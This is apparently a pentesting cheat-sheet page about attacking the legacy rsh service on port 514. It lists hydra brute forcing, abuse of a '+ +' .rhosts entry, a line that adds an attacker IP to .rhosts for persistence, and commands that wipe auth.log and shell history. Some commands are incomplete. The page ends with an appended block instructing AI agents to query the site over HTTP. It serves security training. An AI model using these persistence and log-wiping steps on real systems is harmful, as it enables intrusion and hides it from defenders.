# Rsh - Port 514
{% tabs %}
{% tab title="Support VeryLazyTech 🎉" %}
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
* **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **🕵️♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endtab %}
{% endtabs %}
## Basic Info
For authentication, **.rhosts** files along with **/etc/hosts.equiv** were utilized by **Rsh**. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.
Moreover, it was common for the **.rhosts** files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.
**Default port**: 514
## Login
```
rsh
rsh -l domain\user
rsh domain/user@
rsh domain\\user@
```
***
## Attack Vectors[](https://hackviser.com/tactics/pentesting/services/rsh#attack-vectors)
### Exploiting Weak Authentication[](https://hackviser.com/tactics/pentesting/services/rsh#exploiting-weak-authentication)
Check for weak authentication mechanisms. RSH often relies on the `.rhosts` file for authentication, which can be easily exploited if not properly configured.
### Brute Force Attacks[](https://hackviser.com/tactics/pentesting/services/rsh#brute-force-attacks)
You can perform brute-force attacks to guess weak passwords using tools like `hydra`:
```
hydra -l -P /path/to/passwords.txt rsh
```
This command attempts to brute-force the specified RSH server.
### Exploiting Misconfigurations[](https://hackviser.com/tactics/pentesting/services/rsh#exploiting-misconfigurations)
Look for misconfigured `.rhosts` files that allow unauthorized access. For example, a `.rhosts` file with the following entry can be exploited:
```
+ +
```
This entry allows any user from any host to log in without a password.
***
## Post-Exploitation[](https://hackviser.com/tactics/pentesting/services/rsh#post-exploitation)
### Privilege Escalation[](https://hackviser.com/tactics/pentesting/services/rsh#privilege-escalation)
After gaining access, attempt to escalate privileges to a higher-level account. One common method is to search for SUID binaries:
```
rsh -l find / -perm -4000 -type f 2>/dev/null
```
This command lists all SUID binaries, which could potentially be exploited for privilege escalation.
### Data Exfiltration[](https://hackviser.com/tactics/pentesting/services/rsh#data-exfiltration)
Once you have access, you can exfiltrate data from the remote machine. For example, you can copy files using the `rcp` (remote copy) command:
```
rcp :
```
### Persistent Access[](https://hackviser.com/tactics/pentesting/services/rsh#persistent-access)
To maintain persistent access, you can add your SSH key to the `~/.ssh/authorized_keys` file or modify the `.rhosts` file to allow your host:
```
echo "attacker-ip attacker-user" >> ~/.rhosts
```
This entry grants login permissions to the specified user on the attacker's IP address.
### Covering Tracks[](https://hackviser.com/tactics/pentesting/services/rsh#covering-tracks)
It's crucial to cover your tracks to avoid detection. You can delete log entries related to your activities:
```
rsh -l echo "" > /var/log/auth.log
rsh -l history -c
```
These commands clear the authentication log and command history.
***
{% hint style="success" %}
Learn & practice [**For the OSCP.**](https://shop.verylazytech.com/)
Support VeryLazyTech 🎉
Become VeryLazyTech [**member**](https://shop.verylazytech.com/l/Membership)**! 🎁**
* **Follow** us on:
* **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.**
* **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.**
* **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.**
* **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.**
* **🕵️♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.**
* Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.verylazytech.com/network-pentesting/rsh-port-514.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.